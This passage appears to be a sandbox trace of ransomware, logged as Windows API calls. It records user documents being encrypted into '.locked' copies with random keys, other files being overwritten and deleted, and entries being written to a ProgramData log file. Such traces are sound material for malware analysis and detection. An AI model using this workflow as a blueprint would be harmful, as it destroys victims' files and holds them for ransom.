out: lpBuffer=0x1266f000*, lpNumberOfBytesWritten=0x12625d78*=0x80, lpOverlapped=0x0) returned 1 [0292.922] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0292.982] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0292.982] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0292.982] SetEvent (hEvent=0x150) returned 1 [0292.982] SetEvent (hEvent=0x14c) returned 1 [0292.982] SetEvent (hEvent=0x20c) returned 1 [0292.982] SetEvent (hEvent=0x104) returned 1 [0292.983] ReadFile (in: hFile=0x1c8, lpBuffer=0x12bb0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12625d68, lpOverlapped=0x0 | out: lpBuffer=0x12bb0000*, lpNumberOfBytesRead=0x12625d68*=0x1128e, lpOverlapped=0x0) returned 1 [0292.985] WriteFile (in: hFile=0x218, lpBuffer=0x12bb0000*, nNumberOfBytesToWrite=0x1128e, lpNumberOfBytesWritten=0x12625d74, lpOverlapped=0x0 | out: lpBuffer=0x12bb0000*, lpNumberOfBytesWritten=0x12625d74*=0x1128e, lpOverlapped=0x0) returned 1 [0293.009] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0293.190] SetEvent (hEvent=0x104) returned 1 [0293.190] ReadFile (in: hFile=0x1c8, lpBuffer=0x12bb0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12625d68, lpOverlapped=0x0 | out: lpBuffer=0x12bb0000*, lpNumberOfBytesRead=0x12625d68*=0x0, lpOverlapped=0x0) returned 1 [0293.193] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0293.546] SetEvent (hEvent=0x150) returned 1 [0293.546] SetEvent (hEvent=0x104) returned 1 [0293.546] CloseHandle (hObject=0x218) returned 1 [0293.551] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0295.200] CloseHandle (hObject=0x1c8) returned 1 [0295.200] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0295.201] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12625e94 | out: lpMode=0x12625e94) returned 0 [0295.201] WriteFile (in: hFile=0x1c8, lpBuffer=0x1234a2c0*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x12625e64, lpOverlapped=0x0 | out: lpBuffer=0x1234a2c0*, lpNumberOfBytesWritten=0x12625e64*=0x37, lpOverlapped=0x0) returned 1 [0295.202] CloseHandle (hObject=0x1c8) returned 1 [0295.208] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\PksQcVAF-FVG.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pksqcvaf-fvg.docx")) returned 1 [0295.343] SetEvent (hEvent=0x20c) returned 1 [0295.343] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0296.580] SetEvent (hEvent=0x22c) returned 1 [0296.586] SetEvent (hEvent=0x20c) returned 1 [0296.586] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0296.654] SetEvent (hEvent=0x22c) returned 1 [0296.654] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0297.209] SetEvent (hEvent=0x1ac) returned 1 [0297.209] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0297.336] SetEvent (hEvent=0x14c) returned 1 [0297.336] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0297.375] SetEvent (hEvent=0x1b8) returned 1 [0297.375] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0297.488] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0297.554] SetEvent (hEvent=0x12c) returned 1 [0297.554] SetEvent (hEvent=0x1b8) returned 1 [0297.554] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0297.628] SetEvent (hEvent=0x12c) returned 1 [0297.628] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0297.696] WriteFile (in: hFile=0x1c8, lpBuffer=0x12796000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124c5e78, lpOverlapped=0x0 | out: lpBuffer=0x12796000*, lpNumberOfBytesWritten=0x124c5e78*=0xfa000, lpOverlapped=0x0) returned 1 [0297.794] CloseHandle (hObject=0x1c8) returned 1 [0298.199] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0299.178] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\CX3dvz.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cx3dvz.pptx")) returned 1 [0299.911] SetEvent (hEvent=0x22c) returned 1 [0299.911] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0299.971] SetEvent (hEvent=0x1b8) returned 1 [0299.971] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x0 [0299.976] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x0 [0299.977] SetEvent (hEvent=0x21c) returned 1 [0299.977] SetEvent (hEvent=0x134) returned 1 [0299.977] SetEvent (hEvent=0x198) returned 1 [0299.977] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0299.977] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb34, ulCount=0x10, ulNumEntriesRemoved=0x33bafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb34, ulNumEntriesRemoved=0x33bafb14) returned 0 [0299.977] SetEvent (hEvent=0x150) returned 1 [0299.977] SetEvent (hEvent=0x198) returned 1 [0300.024] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Crvhk0MgLr2QKx _m.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\crvhk0mglr2qkx _m.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0300.057] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0300.074] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1276be88 | out: lpMode=0x1276be88) returned 0 [0300.074] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0300.158] WriteFile (in: hFile=0x230, lpBuffer=0x1287a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276be78, lpOverlapped=0x0 | out: lpBuffer=0x1287a000*, lpNumberOfBytesWritten=0x1276be78*=0xfa000, lpOverlapped=0x0) returned 1 [0300.328] CloseHandle (hObject=0x230) returned 1 [0300.430] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0300.471] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0300.498] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0300.506] SetEvent (hEvent=0x21c) returned 1 [0300.506] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0300.652] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0300.659] SetEvent (hEvent=0x20c) returned 1 [0300.664] SetEvent (hEvent=0x134) returned 1 [0300.664] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0300.673] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0300.710] SetEvent (hEvent=0x198) returned 1 [0300.710] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0301.529] SetEvent (hEvent=0x198) returned 1 [0301.529] SetEvent (hEvent=0x20c) returned 1 [0301.529] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0302.197] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0302.230] SetEvent (hEvent=0x1f0) returned 1 [0302.230] SetEvent (hEvent=0x21c) returned 1 [0302.230] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0302.698] SetEvent (hEvent=0x21c) returned 1 [0302.698] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0303.065] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\TP7qaB_8RwFo0zi2S F.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\tp7qab_8rwfo0zi2s f.ods")) returned 1 [0303.770] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0303.789] SetEvent (hEvent=0x198) returned 1 [0303.789] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0303.820] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12669a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x12669a24*=0xb) returned 1 [0303.824] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\EzlWVPEgGWw7Xy7.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\ezlwvpeggww7xy7.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0303.825] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12669d9c | out: lpMode=0x12669d9c) returned 0 [0303.825] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\EzlWVPEgGWw7Xy7.ods.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\ezlwvpeggww7xy7.ods.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0303.838] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0303.903] SetEvent (hEvent=0x1ac) returned 1 [0303.903] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x12669d9c | out: lpMode=0x12669d9c) returned 0 [0303.903] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0304.058] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0304.060] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0304.065] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0304.073] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x1239da24*=0xb) returned 1 [0304.133] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0304.211] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\vTjM.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\vtjm.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0304.212] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0304.212] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\vTjM.rtf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\vtjm.rtf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0304.391] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0304.392] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0304.392] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e070 | out: pbBuffer=0x1234e070) returned 1 [0304.392] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0304.392] WriteFile (in: hFile=0x208, lpBuffer=0x126a0000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x126a0000*, lpNumberOfBytesWritten=0x1239dd78*=0x80, lpOverlapped=0x0) returned 1 [0304.397] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0304.397] SetEvent (hEvent=0x214) returned 1 [0304.397] SetEvent (hEvent=0x21c) returned 1 [0304.397] ReadFile (in: hFile=0x1c8, lpBuffer=0x1532e000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x1532e000*, lpNumberOfBytesRead=0x1239dd68*=0x78cd, lpOverlapped=0x0) returned 1 [0304.400] WriteFile (in: hFile=0x208, lpBuffer=0x1532e000*, nNumberOfBytesToWrite=0x78cd, lpNumberOfBytesWritten=0x1239dd74, lpOverlapped=0x0 | out: lpBuffer=0x1532e000*, lpNumberOfBytesWritten=0x1239dd74*=0x78cd, lpOverlapped=0x0) returned 1 [0304.412] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0304.619] ReadFile (in: hFile=0x1c8, lpBuffer=0x1532e000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x1532e000*, lpNumberOfBytesRead=0x1239dd68*=0x0, lpOverlapped=0x0) returned 1 [0304.620] CloseHandle (hObject=0x208) returned 1 [0304.656] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0304.660] SetEvent (hEvent=0x14c) returned 1 [0304.660] CloseHandle (hObject=0x1c8) returned 1 [0304.660] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0304.718] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a3a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x123a3a24*=0xb) returned 1 [0304.731] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0304.772] SetEvent (hEvent=0x12c) returned 1 [0304.772] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0304.773] SetEvent (hEvent=0x21c) returned 1 [0304.773] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0304.797] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x0 [0304.798] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0304.798] SetEvent (hEvent=0x150) returned 1 [0304.798] SetEvent (hEvent=0x1ac) returned 1 [0304.798] SetEvent (hEvent=0x12c) returned 1 [0304.805] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x0 [0304.806] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x0 [0304.807] SetEvent (hEvent=0x1f0) returned 1 [0304.807] SetEvent (hEvent=0x1ac) returned 1 [0304.807] SetEvent (hEvent=0x14c) returned 1 [0304.807] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0304.808] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb34, ulCount=0x10, ulNumEntriesRemoved=0x33bafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb34, ulNumEntriesRemoved=0x33bafb14) returned 0 [0304.808] SetEvent (hEvent=0x150) returned 1 [0304.808] SetEvent (hEvent=0x14c) returned 1 [0304.808] SetEvent (hEvent=0x1ac) returned 1 [0304.810] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\nRY0tYZ9Ff0noTxW-ck.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\nry0tyz9ff0notxw-ck.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0304.813] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12621e88 | out: lpMode=0x12621e88) returned 0 [0304.813] WriteFile (in: hFile=0x230, lpBuffer=0x12918000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12621e78, lpOverlapped=0x0 | out: lpBuffer=0x12918000*, lpNumberOfBytesWritten=0x12621e78*=0xfa000, lpOverlapped=0x0) returned 1 [0304.838] CloseHandle (hObject=0x230) returned 1 [0304.862] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\nRY0tYZ9Ff0noTxW-ck.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\nry0tyz9ff0notxw-ck.pptx")) returned 1 [0304.881] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0305.622] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12621a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x12621a24*=0xb) returned 1 [0305.637] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\THfi.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\thfi.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0305.637] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12621d9c | out: lpMode=0x12621d9c) returned 0 [0305.638] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\THfi.ppt.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\thfi.ppt.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0305.675] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0305.763] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x12621d9c | out: lpMode=0x12621d9c) returned 0 [0305.763] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0305.764] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0305.764] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0305.764] WriteFile (in: hFile=0x208, lpBuffer=0x125eb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12621d78, lpOverlapped=0x0 | out: lpBuffer=0x125eb000*, lpNumberOfBytesWritten=0x12621d78*=0x80, lpOverlapped=0x0) returned 1 [0305.767] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x0 [0305.769] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0305.769] SetEvent (hEvent=0x150) returned 1 [0305.769] SetEvent (hEvent=0x190) returned 1 [0305.769] SetEvent (hEvent=0x220) returned 1 [0305.769] ReadFile (in: hFile=0x1c8, lpBuffer=0x13276000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12621d68, lpOverlapped=0x0 | out: lpBuffer=0x13276000*, lpNumberOfBytesRead=0x12621d68*=0x17aae, lpOverlapped=0x0) returned 1 [0305.774] WriteFile (in: hFile=0x208, lpBuffer=0x13276000*, nNumberOfBytesToWrite=0x17aae, lpNumberOfBytesWritten=0x12621d74, lpOverlapped=0x0 | out: lpBuffer=0x13276000*, lpNumberOfBytesWritten=0x12621d74*=0x17aae, lpOverlapped=0x0) returned 1 [0305.795] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0305.857] SetEvent (hEvent=0x150) returned 1 [0305.857] SetEvent (hEvent=0x1e8) returned 1 [0305.857] ReadFile (in: hFile=0x1c8, lpBuffer=0x13276000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12621d68, lpOverlapped=0x0 | out: lpBuffer=0x13276000*, lpNumberOfBytesRead=0x12621d68*=0x0, lpOverlapped=0x0) returned 1 [0305.857] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0306.043] CloseHandle (hObject=0x208) returned 1 [0306.045] CloseHandle (hObject=0x1c8) returned 1 [0306.045] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0306.046] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12621e94 | out: lpMode=0x12621e94) returned 0 [0306.046] WriteFile (in: hFile=0x1c8, lpBuffer=0x1264a240*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x12621e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a240*, lpNumberOfBytesWritten=0x12621e64*=0x33, lpOverlapped=0x0) returned 1 [0306.046] CloseHandle (hObject=0x1c8) returned 1 [0306.047] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\THfi.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\thfi.ppt")) returned 1 [0306.062] SetEvent (hEvent=0x21c) returned 1 [0306.062] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0306.393] SetEvent (hEvent=0x1ac) returned 1 [0306.394] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0306.462] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\eJiGd4u4uD5.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\ejigd4u4ud5.pps"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0306.530] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x1276be88 | out: lpMode=0x1276be88) returned 0 [0306.530] WriteFile (in: hFile=0x208, lpBuffer=0x13356000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276be78, lpOverlapped=0x0 | out: lpBuffer=0x13356000*, lpNumberOfBytesWritten=0x1276be78*=0xfa000, lpOverlapped=0x0) returned 1 [0306.559] CloseHandle (hObject=0x208) returned 1 [0306.592] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\eJiGd4u4uD5.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\ejigd4u4ud5.pps")) returned 1 [0306.622] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0306.787] SetEvent (hEvent=0x14c) returned 1 [0306.787] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0306.884] SetEvent (hEvent=0x190) returned 1 [0306.885] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0306.929] SetEvent (hEvent=0x1b8) returned 1 [0306.929] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0306.931] SetEvent (hEvent=0x134) returned 1 [0306.931] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0306.978] SetEvent (hEvent=0x1e8) returned 1 [0306.978] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0307.360] SetEvent (hEvent=0x1ac) returned 1 [0307.360] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0307.370] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\EzBvLweM.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\ezbvlwem.doc")) returned 1 [0307.445] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0307.703] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0307.705] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0307.710] SetEvent (hEvent=0x1b8) returned 1 [0307.710] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0307.844] SetEvent (hEvent=0x1f0) returned 1 [0307.844] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0307.853] SetEvent (hEvent=0x1ac) returned 1 [0307.853] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0307.859] SetEvent (hEvent=0x198) returned 1 [0307.859] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0308.777] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0310.628] SetEvent (hEvent=0x1d0) returned 1 [0310.629] SetEvent (hEvent=0x220) returned 1 [0310.629] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0310.632] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0311.694] SetEvent (hEvent=0x104) returned 1 [0311.694] SetEvent (hEvent=0x21c) returned 1 [0311.694] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0311.828] SetEvent (hEvent=0x104) returned 1 [0311.828] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0311.830] SetEvent (hEvent=0x22c) returned 1 [0311.830] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0312.020] SetEvent (hEvent=0x214) returned 1 [0312.020] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0312.405] SetEvent (hEvent=0x104) returned 1 [0312.405] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0312.410] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0312.410] WaitForSingleObject 